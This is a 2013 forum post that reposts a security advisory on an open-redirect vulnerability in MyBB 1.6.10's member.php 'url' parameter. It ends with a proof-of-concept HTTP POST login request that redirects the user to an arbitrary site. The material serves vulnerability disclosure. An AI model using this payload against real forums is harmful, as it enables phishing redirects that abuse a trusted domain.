Matt Posted August 7, 2013 Report Posted August 7, 2013 Description : MyBB version 1.6.10 suffers from an arbitrary site redirection vulnerability.Author : LiquidWormSource : MyBB 1.6.10 Open Redirection ? Packet StormCode : MyBB 1.6.10 'url' Parameter Arbitrary Site Redirection VulnerabilityVendor: MyBB GroupProduct web page: http://www.mybb.comAffected version: 1.6.10Summary: MyBB, also known as MyBBoard or MyBulletinBoard, is a powerful,efficient, and free forum package, developed using PHP and MySQL.Desc: Input passed via the 'url' parameter in 'member.php' script is notproperly verified before being used to redirect users. This can be exploitedto redirect a user to an arbitrary website e.g. when a user clicks a speciallycrafted link to the affected script hosted on a trusted domain.Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.7 MySQL 5.5.25aVulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2013-5152Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5152.php02.08.2013---POST /mybb/member.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://localhost/mybb/index.phpConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 133action=do_login&url=http://www.zeroscience.mk&quick_login=1&quick_username=admin&quick_password=admin&submit=Login&quick_remember=yes Quote